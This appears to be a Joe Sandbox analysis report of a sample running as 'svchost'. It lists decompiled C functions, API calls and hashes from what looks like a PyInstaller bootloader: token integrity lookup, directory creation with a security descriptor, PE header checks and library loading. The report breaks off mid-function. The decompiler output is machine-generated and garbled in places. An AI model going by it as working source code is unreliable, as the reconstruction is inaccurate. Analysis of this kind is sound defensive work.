                            control_flow_graph 512 bc4920-bc4950 GetCurrentProcess OpenProcessToken 513 bc49ae-bc49bf call bc9803 512->513 514 bc4952-bc4967 GetTokenInformation 512->514 521 bc49c8-bc49cf 513->521 522 bc49c1-bc49c2 CloseHandle 513->522 515 bc4969-bc4972 GetLastError 514->515 516 bc4974-bc4986 call bc97f8 514->516 515->513 515->516 516->513 523 bc4988-bc49a0 GetTokenInformation 516->523 522->521 523->513 524 bc49a2-bc49a9 ConvertSidToStringSidW 523->524 524->513
                            C-Code - Quality: 70%
                            			E00BC4920() {
                            				void* _v4;
                            				void* _v8;
                            				long _v12;
                            				long _v16;
                            				void* _t18;
                            				int _t22;
                            				int _t25;
                            				void* _t28;
                            				void* _t30;
                            				long* _t32;
                            
                            				_t32 =  &_v12;
                            				_v8 = 0xffffffff;
                            				_t30 = 0;
                            				_v12 = 0;
                            				_v4 = 0;
                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
                            					_t22 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
                            					if(_t22 != 0 || GetLastError() == 0x7a) {
                            						_push(_v16);
                            						_push(1);
                            						_t30 = E00BC97F8(_t28);
                            						_t32 =  &(_t32[2]);
                            						if(_t30 != 0) {
                            							_t25 = GetTokenInformation(_v12, 1, _t30, _v16,  &_v16); // executed
                            							if(_t25 != 0) {
                            								_push( &_v12);
                            								_push( *_t30);
                            								L00BC7858();
                            							}
                            						}
                            					}
                            				}
                            				L00BC9803(_t30);
                            				_t18 = _v8;
                            				if(_t18 != 0xffffffff) {
                            					CloseHandle(_t18);
                            				}
                            				return _v4;
                            			}














                            APIs
                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 00BC4941
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00BC4948
                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00BC495F
                            • GetLastError.KERNEL32 ref: 00BC4969
                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 00BC4998
                            • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 00BC49A9
                            • CloseHandle.KERNEL32(?,00000000,?,?,00000000,00BC210F,?,?,00000000,?,00000000), ref: 00BC49C2
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                            • String ID:
                            • API String ID: 995526605-0
                            • Opcode ID: 5a6ee63d591d83bb6be8bc16d9dce6324b07dd25b86158acacfacc9a75d95cea
                            • Instruction ID: f7dd052f249e8ca1211d5d7284ad9261e05c01bad4ffbdcafd807cb663b267c6
                            • Opcode Fuzzy Hash: 5a6ee63d591d83bb6be8bc16d9dce6324b07dd25b86158acacfacc9a75d95cea
                            • Instruction Fuzzy Hash: 1B114F71544221AFD620AF54DC88F5B7FE8EF40760F00495CF989D61A1DBB1CA99CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 83%
                            			E00BC1320(void* __ecx, void* __edx, void* __eflags) {
                            				void* __ebx;
                            				void* __edi;
                            				void* __ebp;
                            				void* _t7;
                            				signed int _t9;
                            				void* _t10;
                            				signed int _t15;
                            				signed int _t17;
                            				void* _t19;
                            				intOrPtr _t27;
                            				signed int _t28;
                            				intOrPtr _t29;
                            				signed int _t30;
                            				void* _t31;
                            
                            				_t21 = __edx;
                            				_t20 = __ecx;
                            				_t29 =  *((intOrPtr*)(_t31 + 0x10));
                            				_t27 =  *((intOrPtr*)(_t31 + 0x10));
                            				_push(_t29);
                            				_push(_t27);
                            				_t19 = E00BC1220(__ecx, __edx);
                            				_t7 = E00BC3C20(__edx, _t27);
                            				if(_t7 != 0xffffffff) {
                            					_t3 = _t29 + 0x12; // 0x12
                            					_t23 = _t3;
                            					_t4 = _t27 + 0x2068; // 0x2068
                            					_push(_t3);
                            					_t9 = E00BC3EF0(_t19, _t3, __eflags);
                            					_t28 = _t9;
                            					_push( *((intOrPtr*)(_t29 + 0xc)));
                            					L00BC7864();
                            					_t30 = _t9;
                            					__eflags = _t28;
                            					if(__eflags != 0) {
                            						_t10 = E00BCA6CB(_t20, _t19, _t30, 1, _t28); // executed
                            						__eflags = _t10 - 1;
                            						if(__eflags == 0) {
                            							L7:
                            							_push(_t28); // executed
                            							E00BC9889(_t20, _t21, __eflags); // executed
                            							L00BC9803(_t19); // executed
                            							__eflags = 0;
                            							return 0;
                            						} else {
                            							__eflags = _t30;
                            							if(__eflags == 0) {
                            								goto L7;
                            							} else {
                            								_t15 = E00BC17B0(__eflags, "fwrite", "Failed to write all bytes for %s\n", _t23) | 0xffffffff;
                            								__eflags = _t15;
                            								return _t15;
                            							}
                            						}
                            					} else {
                            						_t17 = E00BC17B0(__eflags, "fopen", "%s could not be extracted!\n", _t23) | 0xffffffff;
                            						__eflags = _t17;
                            						return _t17;
                            					}
                            				} else {
                            					return _t7;
                            				}
                            			}


















                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: %s could not be extracted!$Failed to write all bytes for %s$fopen$fwrite
                            • API String ID: 2009864989-741305175
                            • Opcode ID: 22257cc364be4af42ae445a7ff358fd073f32f7c56f34be782e3f0b65398b543
                            • Instruction ID: 2e014bd8dcd3750b5780f228e8a822c374f737257daa49b7a7d73b037c21f9e0
                            • Opcode Fuzzy Hash: 22257cc364be4af42ae445a7ff358fd073f32f7c56f34be782e3f0b65398b543
                            • Instruction Fuzzy Hash: 0F11C663A5135833C61071BD3C4AEDB33DCCE83776B044BEAF920A2583E792991441B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 72%
                            			E00BC4B30(char _a4, intOrPtr _a8, char _a12, void* _a8188, signed int _a8204, WCHAR* _a8212) {
                            				intOrPtr _v0;
                            				struct _SECURITY_ATTRIBUTES _v16;
                            				signed int _t12;
                            				signed int _t19;
                            				signed int _t21;
                            				WCHAR* _t33;
                            				void* _t37;
                            				signed int _t40;
                            
                            				E00BC7880();
                            				_t12 =  *0xbec008; // 0xdc55bb75
                            				_a8204 = _t12 ^ _t40;
                            				_t33 = _a8212;
                            				_t37 = E00BC4920();
                            				_t27 =  !=  ? _t37 : L"S-1-3-4";
                            				E00BC49D0( &_a12, 0x1000, L"D:(A;;FA;;;%s)",  !=  ? _t37 : L"S-1-3-4");
                            				LocalFree(_t37);
                            				_push(0);
                            				_v0 = 0xc;
                            				_push( &_a4);
                            				_push(1);
                            				_t19 =  &_a12;
                            				_a8 = 0;
                            				_push(_t19); // executed
                            				L00BC785E(); // executed
                            				if(_t19 != 0) {
                            					_t21 = CreateDirectoryW(_t33,  &_v16); // executed
                            					asm("sbb eax, eax");
                            					E00BC786A();
                            					return  ~( ~_t21) - 1;
                            				} else {
                            					E00BC786A();
                            					return _t19 | 0xffffffff;
                            				}
                            			}












                            APIs
                              • Part of subcall function 00BC4920: GetCurrentProcess.KERNEL32(00000008,?), ref: 00BC4941
                              • Part of subcall function 00BC4920: OpenProcessToken.ADVAPI32(00000000), ref: 00BC4948
                              • Part of subcall function 00BC4920: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00BC495F
                              • Part of subcall function 00BC4920: GetLastError.KERNEL32 ref: 00BC4969
                              • Part of subcall function 00BC4920: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 00BC4998
                              • Part of subcall function 00BC4920: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 00BC49A9
                              • Part of subcall function 00BC4920: CloseHandle.KERNEL32(?,00000000,?,?,00000000,00BC210F,?,?,00000000,?,00000000), ref: 00BC49C2
                            • LocalFree.KERNEL32(00000000,00BC3D37,00000000,?,?,00000000,00BC210F,?,?,00000000,?,00000000), ref: 00BC4B7B
                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,?,?,00000001), ref: 00BC4B9F
                            • CreateDirectoryW.KERNELBASE(?,?,?), ref: 00BC4BC8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                            • String ID: D:(A;;FA;;;%s)$S-1-3-4
                            • API String ID: 4998090-2855260032
                            • Opcode ID: 142a9d9453a16a66ce799071261f7e5b77556d0f46eb47203423dde03167f370
                            • Instruction ID: 671d544809ce71ef11a46692bf8ed53d0eac9c8442e5a52fe6839a7c9f4b8353
                            • Opcode Fuzzy Hash: 142a9d9453a16a66ce799071261f7e5b77556d0f46eb47203423dde03167f370
                            • Instruction Fuzzy Hash: 7C11E9716443409FE624EB25DC5AFAB77D8EF84710F404A5DF945C61C3EB749904CAA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 637 bc1120-bc1153 call bc9f16 call bc9b2b 642 bc1159-bc115c 637->642 643 bc11f2-bc11f7 637->643 642->643 644 bc1162-bc1189 call bc9f16 call bc9b2b call bc9f16 642->644 650 bc118e-bc11a8 call bc9b2b 644->650 650->643 653 bc11aa-bc11ad 650->653 654 bc11af-bc11b4 653->654 655 bc11b6-bc11b9 653->655 656 bc11c0-bc11f1 call bc9f16 call bc9b2b 654->656 655->643 657 bc11bb 655->657 657->656
                            C-Code - Quality: 100%
                            			E00BC1120(void* __edx, void* _a4) {
                            				char _v4;
                            				signed int _t15;
                            				intOrPtr _t30;
                            				signed int _t32;
                            
                            				_t34 = __edx;
                            				_t35 = _a4;
                            				_v4 = 0;
                            				E00BC9F16(__edx,  *_a4, 0, 0); // executed
                            				E00BC9B2B( &_a4, 1, 2,  *_a4); // executed
                            				_t15 = _a4;
                            				if(_t15 != 0x4d || _t15 != 0x5a) {
                            					L8:
                            					return _t15 | 0xffffffff;
                            				} else {
                            					E00BC9F16(__edx,  *_t35, 0x3c, 0); // executed
                            					E00BC9B2B( &_v4, 4, 1,  *_t35);
                            					E00BC9F16(__edx,  *_t35, _v4 + 0x18, 0); // executed
                            					E00BC9B2B( &_a4, 2, 1,  *_t35);
                            					_t15 = _a4;
                            					if(_t15 != 0xb) {
                            						goto L8;
                            					} else {
                            						if(_t15 != 1) {
                            							if(_t15 != 2) {
                            								goto L8;
                            							} else {
                            								_t32 = 0xa8;
                            								goto L7;
                            							}
                            						} else {
                            							_t32 = 0x98;
                            							L7:
                            							E00BC9F16(_t34,  *_t35, _v4 + _t32, 0);
                            							E00BC9B2B( &_v4, 4, 1,  *_t35);
                            							_t30 = _v4;
                            							_t31 =  ==  ? _t32 | 0xffffffff : _t30;
                            							return  ==  ? _t32 | 0xffffffff : _t30;
                            						}
                            					}
                            				}
                            			}








                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __fread_nolock
                            • String ID:
                            • API String ID: 2638373210-0
                            • Opcode ID: 0f18c8a29637b3e68dead0b09e1943be6a98e9a9608b54b83cbe93af802145a5
                            • Instruction ID: 6562a225a6d9a55a652f5c0f4fdcab9b1f01f768efeb802c34641febffc84a15
                            • Opcode Fuzzy Hash: 0f18c8a29637b3e68dead0b09e1943be6a98e9a9608b54b83cbe93af802145a5
                            • Instruction Fuzzy Hash: DE21DC71644301BAFA306E18CC87F9A73DAEF41724F14095DF3D0BA1D6DAAADC428B06
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 662 bd3623-bd3637 663 bd3639-bd3642 662->663 664 bd3644-bd365f LoadLibraryExW 662->664 665 bd369b-bd369d 663->665 666 bd3688-bd368e 664->666 667 bd3661-bd366a GetLastError 664->667 670 bd3697 666->670 671 bd3690-bd3691 FreeLibrary 666->671 668 bd366c-bd3677 LoadLibraryExW 667->668 669 bd3679 667->669 673 bd367b-bd367d 668->673 669->673 672 bd3699-bd369a 670->672 671->670 672->665 673->666 674 bd367f-bd3686 673->674 674->672
                            C-Code - Quality: 95%
                            			E00BD3623(signed int _a4) {
                            				signed int _t9;
                            				void* _t10;
                            				void* _t13;
                            				signed int _t15;
                            				WCHAR* _t22;
                            				signed int _t24;
                            				signed int* _t25;
                            				void* _t27;
                            
                            				_t9 = _a4;
                            				_t25 = 0xbf6318 + _t9 * 4;
                            				_t24 =  *_t25;
                            				if(_t24 == 0) {
                            					_t22 =  *(0xbe52d0 + _t9 * 4);
                            					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
                            					_t27 = _t10;
                            					if(_t27 != 0) {
                            						L8:
                            						 *_t25 = _t27;
                            						if( *_t25 != 0) {
                            							FreeLibrary(_t27);
                            						}
                            						_t13 = _t27;
                            						L11:
                            						return _t13;
                            					}
                            					_t15 = GetLastError();
                            					if(_t15 != 0x57) {
                            						_t27 = 0;
                            					} else {
                            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                            						_t27 = _t15;
                            					}
                            					if(_t27 != 0) {
                            						goto L8;
                            					} else {
                            						 *_t25 = _t15 | 0xffffffff;
                            						_t13 = 0;
                            						goto L11;
                            					}
                            				}
                            				_t4 = _t24 + 1; // 0xdc55bb76
                            				asm("sbb eax, eax");
                            				return  ~_t4 & _t24;
                            			}












                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00BCA8EB,00000000,00000000,?,00BD35CA,00BCA8EB,00000000,00000000,00000000,?,00BD3889,00000006,FlsSetValue), ref: 00BD3655
                            • GetLastError.KERNEL32(?,00BD35CA,00BCA8EB,00000000,00000000,00000000,?,00BD3889,00000006,FlsSetValue,00BE57B4,00BE57BC,00000000,00000364,?,00BD44F7), ref: 00BD3661
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BD35CA,00BCA8EB,00000000,00000000,00000000,?,00BD3889,00000006,FlsSetValue,00BE57B4,00BE57BC,00000000), ref: 00BD366F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: 04f3f4141535950b89122747bc35fcc940189aac7c653922ac30ef19a7fdac46
                            • Instruction ID: 83614d5b7ab0062dcfd3b828f8afdd9a72f3f74cdb05e2738fec975dd08a5e3f
                            • Opcode Fuzzy Hash: 04f3f4141535950b89122747bc35fcc940189aac7c653922ac30ef19a7fdac46
                            • Instruction Fuzzy Hash: 29012B32619326BBC7218B78AC84E56B7D8EF04F617210661F909DB342EB70DD40C7E5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 675 bc2450-bc2491 call bc7880 call bca7eb call bcd2be call bc1770 684 bc24ad-bc24bf call bc27a0 675->684 685 bc2493-bc24ac call bc786a 675->685 684->685 690 bc24c1-bc24d8 call bc26f0 684->690 690->685 693 bc24da-bc24f1 call bc2930 690->693 693->685 696 bc24f3-bc251a call bc3e40 call bc43d0 call bc1690 693->696 703 bc251c-bc252f call bc1690 696->703 704 bc2566-bc257c 696->704 703->704 712 bc2531-bc2565 call bc1910 call bc786a 703->712 706 bc257e-bc2589 call bc21d0 704->706 707 bc2596-bc25b7 call bc4bf0 SetDllDirectoryW call bc9803 704->707 716 bc258f 706->716 717 bc2656-bc2661 call bc2070 706->717 721 bc25bd-bc25bf 707->721 722 bc264f 707->722 716->707 727 bc269d-bc26a0 717->727 728 bc2663-bc269b call bc4390 call bc3e40 call bc80a0 717->728 725 bc25c6-bc25ca 721->725 722->717 730 bc25cc-bc25ce 725->730 731 bc25e6-bc25e8 725->731 729 bc26d6-bc26ee call bc786a 727->729 728->727 752 bc26a2-bc26c0 call bc23d0 call bc4400 728->752 734 bc25d0-bc25d6 730->734 735 bc25e2-bc25e4 730->735 736 bc25eb-bc25ed 731->736 734->731 739 bc25d8-bc25e0 734->739 735->736 740 bc25ef-bc260e call bc1ac0 736->740 741 bc2633-bc264a call bc2140 call bc2010 call bc2130 736->741 739->725 739->735 740->727 751 bc2614-bc2624 740->751 760 bc26d4 741->760 754 bc2626-bc2631 751->754 762 bc26cb-bc26d1 call bc1730 752->762 763 bc26c2-bc26c3 call bc40e0 752->763 754->741 754->754 760->729 762->760 766 bc26c8 763->766 766->762
                            C-Code - Quality: 40%
                            			E00BC2450(void* __edx, void* __eflags, char _a4092, char _a4096, char _a8192, signed int _a12284, signed int _a12288, intOrPtr _a12292, intOrPtr _a12296, intOrPtr _a12300) {
                            				char _v0;
                            				char _v4;
                            				void* __ebx;
                            				void* __edi;
                            				void* __ebp;
                            				signed int _t35;
                            				signed int _t39;
                            				signed int _t49;
                            				signed int _t52;
                            				signed int _t53;
                            				signed int _t60;
                            				signed int _t63;
                            				signed int _t64;
                            				signed int _t68;
                            				signed int _t69;
                            				signed int _t71;
                            				signed int _t74;
                            				void* _t76;
                            				signed int _t77;
                            				void* _t79;
                            				signed int _t85;
                            				signed int _t87;
                            				signed int _t91;
                            				signed int _t93;
                            				intOrPtr _t98;
                            				signed int _t101;
                            				intOrPtr* _t102;
                            				intOrPtr _t104;
                            				signed int _t108;
                            				void* _t110;
                            				void* _t112;
                            				void* _t114;
                            				signed int _t115;
                            				void* _t117;
                            				void* _t120;
                            
                            				_t120 = __eflags;
                            				_t90 = __edx;
                            				E00BC7880();
                            				_t35 =  *0xbec008; // 0xdc55bb75
                            				_a12288 = _t35 ^ _t108;
                            				_t104 = _a12300;
                            				E00BCD2BE(E00BCA7EB(2), 0);
                            				_push(0);
                            				_t39 = E00BC1770(_t120);
                            				_t93 = _t39;
                            				_t110 = _t108 + 0x10;
                            				if(_t93 != 0) {
                            					_t39 = E00BC27A0(__edx,  &_v0, _v0);
                            					_t110 = _t110 + 8;
                            					__eflags = _t39;
                            					if(_t39 == 0) {
                            						goto L1;
                            					} else {
                            						_t39 = E00BC26F0( &_a8192,  &_v0);
                            						_t110 = _t110 + 8;
                            						__eflags = _t39;
                            						if(__eflags == 0) {
                            							goto L1;
                            						} else {
                            							_t39 = L00BC2930(__eflags,  &_a4096,  &_v0);
                            							_t110 = _t110 + 8;
                            							__eflags = _t39;
                            							if(_t39 == 0) {
                            								goto L1;
                            							} else {
                            								_push(_t76);
                            								_push("_MEIPASS2");
                            								_t77 = E00BC3E40(_t76, _t93);
                            								E00BC43D0("_MEIPASS2");
                            								_t49 = E00BC1690(_t104, _t93,  &_v0);
                            								_t112 = _t110 + 0x10;
                            								__eflags = _t49;
                            								if(_t49 != 0) {
                            									L8:
                            									 *((intOrPtr*)(_t93 + 0x4074)) = _t104;
                            									_t98 = _a12296;
                            									 *((intOrPtr*)(_t93 + 0x4070)) = _t98;
                            									__eflags = _t77;
                            									if(_t77 != 0) {
                            										L11:
                            										__imp__SetDllDirectoryW(E00BC4BF0(0, _t77, 0));
                            										L00BC9803(_t50);
                            										_t114 = _t112 + 0x10;
                            										__eflags = _t77;
                            										if(_t77 == 0) {
                            											_t98 = _a12292;
                            											goto L25;
                            										} else {
                            											_t85 = _t77;
                            											_t63 =  &_a4092;
                            											while(1) {
                            												_t91 =  *_t63;
                            												__eflags = _t91 -  *_t85;
                            												if(_t91 !=  *_t85) {
                            													break;
                            												}
                            												__eflags = _t91;
                            												if(_t91 == 0) {
                            													L17:
                            													_t64 = 0;
                            												} else {
                            													_t91 =  *((intOrPtr*)(_t63 + 1));
                            													__eflags = _t91 -  *((intOrPtr*)(_t85 + 1));
                            													if(_t91 !=  *((intOrPtr*)(_t85 + 1))) {
                            														break;
                            													} else {
                            														_t63 = _t63 + 2;
                            														_t85 = _t85 + 2;
                            														__eflags = _t91;
                            														if(_t91 != 0) {
                            															continue;
                            														} else {
                            															goto L17;
                            														}
                            													}
                            												}
                            												L19:
                            												__eflags = _t64;
                            												if(__eflags == 0) {
                            													L23:
                            													_push(_t93);
                            													E00BC2140(_t91, __eflags);
                            													_t101 = E00BC2010(_t77, __eflags, _t93);
                            													L00BC2130(_t93);
                            													_t115 = _t114 + 0xc;
                            													goto L31;
                            												} else {
                            													_t21 = _t93 + 0x2068; // 0x2068
                            													_t102 = _t21;
                            													_t52 = E00BC1AC0(_t102, 0x1000, "%s", _t77);
                            													_t115 = _t114 + 0x10;
                            													__eflags = _t52 - 0x1000;
                            													if(_t52 >= 0x1000) {
                            														goto L27;
                            													} else {
                            														_t22 = _t93 + 0x3068; // 0x3068
                            														 *((intOrPtr*)(_t93 + 0x4068)) = 1;
                            														_t87 = _t22 - _t102;
                            														__eflags = _t87;
                            														do {
                            															_t68 =  *_t102;
                            															_t102 = _t102 + 1;
                            															 *((char*)(_t87 + _t102 - 1)) = _t68;
                            															__eflags = _t68;
                            														} while (__eflags != 0);
                            														goto L23;
                            													}
                            												}
                            												goto L32;
                            											}
                            											asm("sbb eax, eax");
                            											_t64 = _t63 | 0x00000001;
                            											__eflags = _t64;
                            											goto L19;
                            										}
                            									} else {
                            										_t69 = E00BC21D0(_t93);
                            										_t114 = _t112 + 4;
                            										__eflags = _t69;
                            										if(_t69 != 0) {
                            											L25:
                            											_t52 = E00BC2070(_t90, _t104, _t93);
                            											_t115 = _t114 + 4;
                            											__eflags = _t52;
                            											if(_t52 != 0) {
                            												L27:
                            												_t53 = _t52 | 0xffffffff;
                            											} else {
                            												__eflags =  *((char*)(_t93 + 0x2068));
                            												_t29 = _t93 + 0x2068; // 0x2068
                            												_t79 = _t29;
                            												_t55 =  !=  ? _t79 :  &_a4092;
                            												E00BC4390("_MEIPASS2",  !=  ? _t79 :  &_a4092);
                            												_push("_MEIPASS2");
                            												E00BC3E40(_t79, _t93);
                            												_push(_t93);
                            												_t52 = E00BC80A0();
                            												_t115 = _t115 + 0x10;
                            												__eflags = _t52 - 0xffffffff;
                            												if(__eflags != 0) {
                            													E00BC23D0(_t52);
                            													_push(_t104);
                            													_push(_t98);
                            													_push(_t93);
                            													_push( &_v4);
                            													_t60 = E00BC4400(_t90, _t104, __eflags);
                            													_t117 = _t115 + 0x10;
                            													_t101 = _t60;
                            													__eflags =  *((intOrPtr*)(_t93 + 0x4068)) - 1;
                            													if( *((intOrPtr*)(_t93 + 0x4068)) == 1) {
                            														_push(_t79); // executed
                            														E00BC40E0(_t90); // executed
                            														_t117 = _t117 + 4;
                            													}
                            													E00BC1730(_t90, _t104, _t93);
                            													_t115 = _t117 + 4;
                            													L31:
                            													_t53 = _t101;
                            												} else {
                            													goto L27;
                            												}
                            											}
                            										} else {
                            											_t77 =  &_a4096;
                            											goto L11;
                            										}
                            									}
                            									L32:
                            									__eflags = _a12284 ^ _t115;
                            									E00BC786A();
                            									return _t53;
                            								} else {
                            									_t71 = E00BC1690(_t104, _t93,  &_a8192);
                            									_t112 = _t112 + 8;
                            									__eflags = _t71;
                            									if(__eflags != 0) {
                            										goto L8;
                            									} else {
                            										_push( &_a8192);
                            										_t74 = E00BC1910(__eflags, "Cannot open self %s or archive %s\n",  &_v0);
                            										__eflags = _a12288 ^ _t112 + 0x0000000c;
                            										E00BC786A();
                            										return _t74 | 0xffffffff;
                            									}
                            								}
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					E00BC786A();
                            					return _t39 | 0xffffffff;
                            				}
                            			}







































                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID: Cannot open self %s or archive %s$_MEIPASS2
                            • API String ID: 0-930416966
                            • Opcode ID: 809ffe98af346ba00eff5474f8db185799c0840577872c886a994e2bd7be8c3e
                            • Instruction ID: 0c881da09ee5a96b7feed6cb3ca558170ab86a5f16dff91839f3f00dd3a5e326
                            • Opcode Fuzzy Hash: 809ffe98af346ba00eff5474f8db185799c0840577872c886a994e2bd7be8c3e
                            • Instruction Fuzzy Hash: 99515C729042406BE621BB709C92FAB73DCEF91354F0405BDF95882283FB25DA18C6B3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 768 bd308b-bd30b0 769 bd30b9-bd30bb 768->769 770 bd30b2-bd30b4 768->770 772 bd30bd-bd30d7 call bcc9bb call bcc9ce call bd1788 769->772 773 bd30dc-bd3101 769->773 771 bd3287-bd3296 call bc786a 770->771 772->771 775 bd3108-bd310e 773->775 776 bd3103-bd3106 773->776 781 bd312d 775->781 782 bd3110-bd3128 call bcc9bb call bcc9ce call bd1788 775->782 776->775 780 bd3130-bd3135 776->780 785 bd3137-bd3143 call bd2807 780->785 786 bd3146-bd314f call bd2c30 780->786 781->780 816 bd327e-bd3281 782->816 785->786 797 bd318a-bd319c 786->797 798 bd3151-bd3153 786->798 800 bd319e-bd31a4 797->800 801 bd31e4-bd3205 WriteFile 797->801 802 bd3155-bd315a 798->802 803 bd3177-bd3180 call bd2a10 798->803 810 bd31d4-bd31e2 call bd2ca6 800->810 811 bd31a6-bd31a9 800->811 807 bd3207-bd320d GetLastError 801->807 808 bd3210 801->808 804 bd324e-bd3260 802->804 805 bd3160-bd316d call bd2bc3 802->805 817 bd3185-bd3188 803->817 814 bd326b-bd327b call bcc9ce call bcc9bb 804->814 815 bd3262-bd3265 804->815 825 bd3170-bd3172 805->825 807->808 818 bd3213-bd321e 808->818 810->817 819 bd31ab-bd31ae 811->819 820 bd31c4-bd31d2 call bd2e73 811->820 814->816 815->814 823 bd3267-bd3269 815->823 829 bd3286 816->829 817->825 826 bd3220-bd3225 818->826 827 bd3283 818->827 819->804 828 bd31b4-bd31c2 call bd2d85 819->828 820->817 823->829 825->818 833 bd324b 826->833 834 bd3227-bd322c 826->834 827->829 828->817 829->771 833->804 837 bd322e-bd3240 call bcc9ce call bcc9bb 834->837 838 bd3242-bd3249 call bcc998 834->838 837->816 838->816
                            C-Code - Quality: 97%
                            			E00BD308B(signed int _a4, void* _a8, signed int _a12) {
                            				signed int _v8;
                            				long _v12;
                            				struct _OVERLAPPED* _v16;
                            				long _v20;
                            				char _v24;
                            				signed int _v28;
